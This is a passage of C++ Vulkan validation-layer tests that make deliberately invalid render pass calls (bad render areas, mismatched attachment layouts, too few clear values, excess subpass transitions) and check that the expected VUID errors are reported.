ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState(nullptr, nullptr, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); // Framebuffer for render target is 256x256, exceed that for INVALID_RENDER_AREA m_renderPassBeginInfo.renderArea.extent.width = 257; m_renderPassBeginInfo.renderArea.extent.height = 257; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &m_renderPassBeginInfo, rp2Supported, "Cannot execute a render pass with renderArea not within the bound of the framebuffer.", "Cannot execute a render pass with renderArea not within the bound of the framebuffer."); } TEST_F(VkLayerTest, RenderPassBeginWithinRenderPass) { // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); PFN_vkCmdBeginRenderPass2KHR vkCmdBeginRenderPass2KHR = nullptr; bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState()); if (rp2Supported) { vkCmdBeginRenderPass2KHR = (PFN_vkCmdBeginRenderPass2KHR)vk::GetDeviceProcAddr(m_device->device(), "vkCmdBeginRenderPass2KHR"); } ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); // Bind a BeginRenderPass within an active RenderPass m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); // Just use a dummy Renderpass m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdBeginRenderPass-renderpass"); vk::CmdBeginRenderPass(m_commandBuffer->handle(), &m_renderPassBeginInfo, VK_SUBPASS_CONTENTS_INLINE); m_errorMonitor->VerifyFound(); if (rp2Supported) { VkSubpassBeginInfoKHR subpassBeginInfo = {VK_STRUCTURE_TYPE_SUBPASS_BEGIN_INFO_KHR, nullptr, VK_SUBPASS_CONTENTS_INLINE}; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdBeginRenderPass2-renderpass"); vkCmdBeginRenderPass2KHR(m_commandBuffer->handle(), &m_renderPassBeginInfo, &subpassBeginInfo); m_errorMonitor->VerifyFound(); } } TEST_F(VkLayerTest, RenderPassBeginIncompatibleFramebufferRenderPass) { TEST_DESCRIPTION("Test that renderpass begin is compatible with the framebuffer renderpass "); ASSERT_NO_FATAL_FAILURE(Init(nullptr, nullptr, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); // Create a depth stencil image view VkImageObj image(m_device); image.Init(128, 128, 1, VK_FORMAT_D16_UNORM, VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL); ASSERT_TRUE(image.initialized()); VkImageView dsv; VkImageViewCreateInfo dsvci = {}; dsvci.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; dsvci.pNext = nullptr; dsvci.image = image.handle(); dsvci.viewType = VK_IMAGE_VIEW_TYPE_2D; dsvci.format = VK_FORMAT_D16_UNORM; dsvci.subresourceRange.layerCount = 1; dsvci.subresourceRange.baseMipLevel = 0; dsvci.subresourceRange.levelCount = 1; dsvci.subresourceRange.aspectMask = VK_IMAGE_ASPECT_DEPTH_BIT; vk::CreateImageView(m_device->device(), &dsvci, NULL, &dsv); // Create a renderPass with a single attachment that uses loadOp CLEAR VkAttachmentDescription description = {0, VK_FORMAT_D16_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_LOAD, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_CLEAR, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_GENERAL, VK_IMAGE_LAYOUT_GENERAL}; VkAttachmentReference depth_stencil_ref = {0, VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL}; VkSubpassDescription subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, &depth_stencil_ref, 0, nullptr}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 1, &description, 1, &subpass, 0, nullptr}; VkRenderPass rp1, rp2; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp1); subpass.pDepthStencilAttachment = nullptr; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp2); // Create a framebuffer VkFramebufferCreateInfo fbci = {VK_STRUCTURE_TYPE_FRAMEBUFFER_CREATE_INFO, nullptr, 0, rp1, 1, &dsv, 128, 128, 1}; VkFramebuffer fb; vk::CreateFramebuffer(m_device->handle(), &fbci, nullptr, &fb); VkRenderPassBeginInfo rp_begin = {VK_STRUCTURE_TYPE_RENDER_PASS_BEGIN_INFO, nullptr, rp2, fb, {{0, 0}, {128, 128}}, 0, nullptr}; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, false, "VUID-VkRenderPassBeginInfo-renderPass-00904", nullptr); vk::DestroyRenderPass(m_device->device(), rp1, nullptr); vk::DestroyRenderPass(m_device->device(), rp2, nullptr); vk::DestroyFramebuffer(m_device->device(), fb, nullptr); vk::DestroyImageView(m_device->device(), dsv, nullptr); } TEST_F(VkLayerTest, RenderPassBeginLayoutsFramebufferImageUsageMismatches) { TEST_DESCRIPTION( "Test that renderpass initial/final layouts match up with the usage bits set for each attachment of the framebuffer"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); bool maintenance2Supported = rp2Supported; // Check for VK_KHR_maintenance2 if (!rp2Supported && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MAINTENANCE2_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_MAINTENANCE2_EXTENSION_NAME); maintenance2Supported = true; } ASSERT_NO_FATAL_FAILURE(InitState(nullptr, nullptr, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); if (m_device->props.apiVersion >= VK_API_VERSION_1_1) { maintenance2Supported = true; } // Create an input attachment view VkImageObj iai(m_device); iai.InitNoLayout(128, 128, 1, VK_FORMAT_R8G8B8A8_UNORM, VK_IMAGE_USAGE_INPUT_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL); ASSERT_TRUE(iai.initialized()); VkImageView iav; VkImageViewCreateInfo iavci = {}; iavci.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; iavci.pNext = nullptr; iavci.image = iai.handle(); iavci.viewType = VK_IMAGE_VIEW_TYPE_2D; iavci.format = VK_FORMAT_R8G8B8A8_UNORM; iavci.subresourceRange.layerCount = 1; iavci.subresourceRange.baseMipLevel = 0; iavci.subresourceRange.levelCount = 1; iavci.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; vk::CreateImageView(m_device->device(), &iavci, NULL, &iav); // Create a color attachment view VkImageObj cai(m_device); cai.InitNoLayout(128, 128, 1, VK_FORMAT_R8G8B8A8_UNORM, VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL); ASSERT_TRUE(cai.initialized()); VkImageView cav; VkImageViewCreateInfo cavci = {}; cavci.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; cavci.pNext = nullptr; cavci.image = cai.handle(); cavci.viewType = VK_IMAGE_VIEW_TYPE_2D; cavci.format = VK_FORMAT_R8G8B8A8_UNORM; cavci.subresourceRange.layerCount = 1; cavci.subresourceRange.baseMipLevel = 0; cavci.subresourceRange.levelCount = 1; cavci.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; vk::CreateImageView(m_device->device(), &cavci, NULL, &cav); // Create a renderPass with those attachments VkAttachmentDescription descriptions[] = { {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_CLEAR, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_GENERAL, VK_IMAGE_LAYOUT_GENERAL}, {1, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_CLEAR, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_GENERAL, VK_IMAGE_LAYOUT_GENERAL}}; VkAttachmentReference input_ref = {0, VK_IMAGE_LAYOUT_GENERAL}; VkAttachmentReference color_ref = {1, VK_IMAGE_LAYOUT_GENERAL}; VkSubpassDescription subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 1, &input_ref, 1, &color_ref, nullptr, nullptr, 0, nullptr}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 2, descriptions, 1, &subpass, 0, nullptr}; VkRenderPass rp; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp); // Create a framebuffer VkImageView views[] = {iav, cav}; VkFramebufferCreateInfo fbci = {VK_STRUCTURE_TYPE_FRAMEBUFFER_CREATE_INFO, nullptr, 0, rp, 2, views, 128, 128, 1}; VkFramebuffer fb; vk::CreateFramebuffer(m_device->handle(), &fbci, nullptr, &fb); VkRenderPassBeginInfo rp_begin = {VK_STRUCTURE_TYPE_RENDER_PASS_BEGIN_INFO, nullptr, rp, fb, {{0, 0}, {128, 128}}, 0, nullptr}; VkRenderPass rp_invalid; // Initial layout is VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL but attachment doesn't support IMAGE_USAGE_COLOR_ATTACHMENT_BIT descriptions[0].initialLayout = VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp_invalid); rp_begin.renderPass = rp_invalid; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, rp2Supported, "VUID-vkCmdBeginRenderPass-initialLayout-00895", "VUID-vkCmdBeginRenderPass2-initialLayout-03094"); vk::DestroyRenderPass(m_device->handle(), rp_invalid, nullptr); // Initial layout is VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL but attachment doesn't support VK_IMAGE_USAGE_INPUT_ATTACHMENT_BIT // / VK_IMAGE_USAGE_SAMPLED_BIT descriptions[0].initialLayout = VK_IMAGE_LAYOUT_GENERAL; descriptions[1].initialLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp_invalid); rp_begin.renderPass = rp_invalid; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, rp2Supported, "VUID-vkCmdBeginRenderPass-initialLayout-00897", "VUID-vkCmdBeginRenderPass2-initialLayout-03097"); vk::DestroyRenderPass(m_device->handle(), rp_invalid, nullptr); descriptions[1].initialLayout = VK_IMAGE_LAYOUT_GENERAL; // Initial layout is VK_IMAGE_LAYOUT_TRANSFER_SRC_OPTIMAL but attachment doesn't support VK_IMAGE_USAGE_TRANSFER_SRC_BIT descriptions[0].initialLayout = VK_IMAGE_LAYOUT_TRANSFER_SRC_OPTIMAL; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp_invalid); rp_begin.renderPass = rp_invalid; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, rp2Supported, "VUID-vkCmdBeginRenderPass-initialLayout-00898", "VUID-vkCmdBeginRenderPass2-initialLayout-03098"); vk::DestroyRenderPass(m_device->handle(), rp_invalid, nullptr); // Initial layout is VK_IMAGE_LAYOUT_TRANSFER_DST_OPTIMAL but attachment doesn't support VK_IMAGE_USAGE_TRANSFER_DST_BIT descriptions[0].initialLayout = VK_IMAGE_LAYOUT_TRANSFER_DST_OPTIMAL; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp_invalid); rp_begin.renderPass = rp_invalid; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, rp2Supported, "VUID-vkCmdBeginRenderPass-initialLayout-00899", "VUID-vkCmdBeginRenderPass2-initialLayout-03099"); vk::DestroyRenderPass(m_device->handle(), rp_invalid, nullptr); // Initial layout is VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL but attachment doesn't support // VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT descriptions[0].initialLayout = VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp_invalid); rp_begin.renderPass = rp_invalid; const char *initial_layout_vuid_rp1 = maintenance2Supported ? "VUID-vkCmdBeginRenderPass-initialLayout-01758" : "VUID-vkCmdBeginRenderPass-initialLayout-00896"; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, rp2Supported, initial_layout_vuid_rp1, "VUID-vkCmdBeginRenderPass2-initialLayout-03096"); vk::DestroyRenderPass(m_device->handle(), rp_invalid, nullptr); // Initial layout is VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL but attachment doesn't support // VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT descriptions[0].initialLayout = VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp_invalid); rp_begin.renderPass = rp_invalid; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, rp2Supported, initial_layout_vuid_rp1, "VUID-vkCmdBeginRenderPass2-initialLayout-03096"); vk::DestroyRenderPass(m_device->handle(), rp_invalid, nullptr); if (maintenance2Supported || rp2Supported) { // Initial layout is VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL but attachment doesn't support // VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT descriptions[0].initialLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp_invalid); rp_begin.renderPass = rp_invalid; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, rp2Supported, "VUID-vkCmdBeginRenderPass-initialLayout-01758", "VUID-vkCmdBeginRenderPass2-initialLayout-03096"); vk::DestroyRenderPass(m_device->handle(), rp_invalid, nullptr); // Initial layout is VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL but attachment doesn't support // VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT descriptions[0].initialLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp_invalid); rp_begin.renderPass = rp_invalid; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, rp2Supported, "VUID-vkCmdBeginRenderPass-initialLayout-01758", "VUID-vkCmdBeginRenderPass2-initialLayout-03096"); vk::DestroyRenderPass(m_device->handle(), rp_invalid, nullptr); } vk::DestroyRenderPass(m_device->device(), rp, nullptr); vk::DestroyFramebuffer(m_device->device(), fb, nullptr); vk::DestroyImageView(m_device->device(), iav, nullptr); vk::DestroyImageView(m_device->device(), cav, nullptr); } TEST_F(VkLayerTest, RenderPassBeginClearOpMismatch) { TEST_DESCRIPTION( "Begin a renderPass where clearValueCount is less than the number of renderPass attachments that use " "loadOp VK_ATTACHMENT_LOAD_OP_CLEAR."); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState(nullptr, nullptr, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); // Create a renderPass with a single attachment that uses loadOp CLEAR VkAttachmentReference attach = {}; attach.layout = VK_IMAGE_LAYOUT_GENERAL; VkSubpassDescription subpass = {}; subpass.colorAttachmentCount = 1; subpass.pColorAttachments = &attach; VkRenderPassCreateInfo rpci = {}; rpci.subpassCount = 1; rpci.pSubpasses = &subpass; rpci.attachmentCount = 1; VkAttachmentDescription attach_desc = {}; attach_desc.format = VK_FORMAT_B8G8R8A8_UNORM; // Set loadOp to CLEAR attach_desc.loadOp = VK_ATTACHMENT_LOAD_OP_CLEAR; attach_desc.samples = VK_SAMPLE_COUNT_1_BIT; attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; rpci.pAttachments = &attach_desc; rpci.sType = VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO; VkRenderPass rp; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp); VkRenderPassBeginInfo rp_begin = {}; rp_begin.sType = VK_STRUCTURE_TYPE_RENDER_PASS_BEGIN_INFO; rp_begin.pNext = NULL; rp_begin.renderPass = renderPass(); rp_begin.framebuffer = framebuffer(); rp_begin.clearValueCount = 0; // Should be 1 TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, rp2Supported, "VUID-VkRenderPassBeginInfo-clearValueCount-00902", "VUID-VkRenderPassBeginInfo-clearValueCount-00902"); vk::DestroyRenderPass(m_device->device(), rp, NULL); } TEST_F(VkLayerTest, RenderPassBeginSampleLocationsInvalidIndicesEXT) { TEST_DESCRIPTION("Test that attachment indices and subpass indices specifed by sample locations structures are valid"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); if (DeviceExtensionSupported(gpu(), nullptr, VK_EXT_SAMPLE_LOCATIONS_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_EXT_SAMPLE_LOCATIONS_EXTENSION_NAME); } else { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_EXT_SAMPLE_LOCATIONS_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitState(nullptr, nullptr, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); // Create a depth stencil image view VkImageObj image(m_device); image.Init(128, 128, 1, VK_FORMAT_D16_UNORM, VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL); ASSERT_TRUE(image.initialized()); VkImageView dsv; VkImageViewCreateInfo dsvci = {}; dsvci.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; dsvci.pNext = nullptr; dsvci.image = image.handle(); dsvci.viewType = VK_IMAGE_VIEW_TYPE_2D; dsvci.format = VK_FORMAT_D16_UNORM; dsvci.subresourceRange.layerCount = 1; dsvci.subresourceRange.baseMipLevel = 0; dsvci.subresourceRange.levelCount = 1; dsvci.subresourceRange.aspectMask = VK_IMAGE_ASPECT_DEPTH_BIT; vk::CreateImageView(m_device->device(), &dsvci, NULL, &dsv); // Create a renderPass with a single attachment that uses loadOp CLEAR VkAttachmentDescription description = {0, VK_FORMAT_D16_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_LOAD, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_CLEAR, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_GENERAL, VK_IMAGE_LAYOUT_GENERAL}; VkAttachmentReference depth_stencil_ref = {0, VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL}; VkSubpassDescription subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, &depth_stencil_ref, 0, nullptr}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 1, &description, 1, &subpass, 0, nullptr}; VkRenderPass rp; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp); // Create a framebuffer VkFramebufferCreateInfo fbci = {VK_STRUCTURE_TYPE_FRAMEBUFFER_CREATE_INFO, nullptr, 0, rp, 1, &dsv, 128, 128, 1}; VkFramebuffer fb; vk::CreateFramebuffer(m_device->handle(), &fbci, nullptr, &fb); VkSampleLocationEXT sample_location = {0.5, 0.5}; VkSampleLocationsInfoEXT sample_locations_info = { VK_STRUCTURE_TYPE_SAMPLE_LOCATIONS_INFO_EXT, nullptr, VK_SAMPLE_COUNT_1_BIT, {1, 1}, 1, &sample_location}; VkAttachmentSampleLocationsEXT attachment_sample_locations = {0, sample_locations_info}; VkSubpassSampleLocationsEXT subpass_sample_locations = {0, sample_locations_info}; VkRenderPassSampleLocationsBeginInfoEXT rp_sl_begin = {VK_STRUCTURE_TYPE_RENDER_PASS_SAMPLE_LOCATIONS_BEGIN_INFO_EXT, nullptr, 1, &attachment_sample_locations, 1, &subpass_sample_locations}; VkRenderPassBeginInfo rp_begin = { VK_STRUCTURE_TYPE_RENDER_PASS_BEGIN_INFO, &rp_sl_begin, rp, fb, {{0, 0}, {128, 128}}, 0, nullptr}; attachment_sample_locations.attachmentIndex = 1; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, false, "VUID-VkAttachmentSampleLocationsEXT-attachmentIndex-01531", nullptr); attachment_sample_locations.attachmentIndex = 0; subpass_sample_locations.subpassIndex = 1; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, false, "VUID-VkSubpassSampleLocationsEXT-subpassIndex-01532", nullptr); subpass_sample_locations.subpassIndex = 0; vk::DestroyRenderPass(m_device->device(), rp, nullptr); vk::DestroyFramebuffer(m_device->device(), fb, nullptr); vk::DestroyImageView(m_device->device(), dsv, nullptr); } TEST_F(VkLayerTest, RenderPassNextSubpassExcessive) { TEST_DESCRIPTION("Test that an error is produced when CmdNextSubpass is called too many times in a renderpass instance"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); PFN_vkCmdNextSubpass2KHR vkCmdNextSubpass2KHR = nullptr; bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState()); if (rp2Supported) { vkCmdNextSubpass2KHR = (PFN_vkCmdNextSubpass2KHR)vk::GetDeviceProcAddr(m_device->device(), "vkCmdNextSubpass2KHR"); } ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdNextSubpass-None-00909"); vk::CmdNextSubpass(m_commandBuffer->handle(), VK_SUBPASS_CONTENTS_INLINE); m_errorMonitor->VerifyFound(); if (rp2Supported) { VkSubpassBeginInfoKHR subpassBeginInfo = {VK_STRUCTURE_TYPE_SUBPASS_BEGIN_INFO_KHR, nullptr, VK_SUBPASS_CONTENTS_INLINE}; VkSubpassEndInfoKHR subpassEndInfo = {VK_STRUCTURE_TYPE_SUBPASS_END_INFO_KHR, nullptr}; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdNextSubpass2-None-03102"); vkCmdNextSubpass2KHR(m_commandBuffer->handle(), &subpassBeginInfo, &subpassEndInfo); m_errorMonitor->VerifyFound(); } m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); } TEST_F(VkLayerTest, RenderPassEndBeforeFinalSubpass) { TEST_DESCRIPTION("Test that an error is produced when CmdEndRenderPass is called before the final subpass has been reached"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); PFN_vkCmdEndRenderPass2KHR vkCmdEndRenderPass2KHR = nullptr; bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState(nullptr, nullptr, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); if (rp2Supported) { vkCmdEndRenderPass2KHR = (PFN_vkCmdEndRenderPass2KHR)vk::GetDeviceProcAddr(m_device->device(), "vkCmdEndRenderPass2KHR"); } VkSubpassDescription sd[2] = {{0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, nullptr, 0, nullptr}, {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, nullptr, 0, nullptr}}; VkRenderPassCreateInfo rcpi = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 0, nullptr, 2, sd, 0, nullptr}; VkRenderPass rp; VkResult err = vk::CreateRenderPass(m_device->device(), &rcpi, nullptr, &rp); ASSERT_VK_SUCCESS(err); VkFramebufferCreateInfo fbci = {VK_STRUCTURE_TYPE_FRAMEBUFFER_CREATE_INFO, nullptr, 0, rp, 0, nullptr, 16, 16, 1}; VkFramebuffer fb; err = vk::CreateFramebuffer(m_device->device(), &fbci, nullptr, &fb); ASSERT_VK_SUCCESS(err); m_commandBuffer->begin(); VkRenderPassBeginInfo rpbi = {VK_STRUCTURE_TYPE_RENDER_PASS_BEGIN_INFO, nullptr, rp, fb, {{0, 0}, {16, 16}}, 0, nullptr}; vk::CmdBeginRenderPass(m_commandBuffer->handle(), &rpbi, VK_SUBPASS_CONTENTS_INLINE); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdEndRenderPass-None-00910"); vk::CmdEndRenderPass(m_commandBuffer->handle()); m_errorMonitor->VerifyFound(); if (rp2Supported) { VkSubpassEndInfoKHR subpassEndInfo = {VK_STRUCTURE_TYPE_SUBPASS_END_INFO_KHR, nullptr}; m_commandBuffer->reset(); m_commandBuffer->begin(); vk::CmdBeginRenderPass(m_commandBuffer->handle(), &rpbi, VK_SUBPASS_CONTENTS_INLINE); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdEndRenderPass2-None-03103"); vkCmdEndRenderPass2KHR(m_commandBuffer->handle(), &subpassEndInfo); m_errorMonitor->VerifyFound(); } // Clean up. vk::DestroyFramebuffer(m_device->device(), fb, nullptr); vk::DestroyRenderPass(m_device->device(), rp, nullptr); } TEST_F(VkLayerTest, RenderPassDestroyWhileInUse) { TEST_DESCRIPTION("Delete in-use renderPass."); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); // Create simple renderpass VkAttachmentReference attach = {}; attach.layout = VK_IMAGE_LAYOUT_GENERAL; VkSubpassDescription subpass = {}; subpass.colorAttachmentCount = 1; subpass.pColorAttachments = &attach; VkRenderPassCreateInfo rpci = {}; rpci.subpassCount = 1; rpci.pSubpasses = &subpass; rpci.attachmentCount = 1; VkAttachmentDescription attach_desc = {}; attach_desc.format = VK_FORMAT_B8G8R8A8_UNORM; attach_desc.samples = VK_SAMPLE_COUNT_1_BIT; attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; rpci.pAttachments = &attach_desc; rpci.sType = VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO; VkRenderPass rp; VkResult err = vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp); ASSERT_VK_SUCCESS(err); m_errorMonitor->ExpectSuccess(); m_commandBuffer->begin(); VkRenderPassBeginInfo rpbi = {}; rpbi.sType = 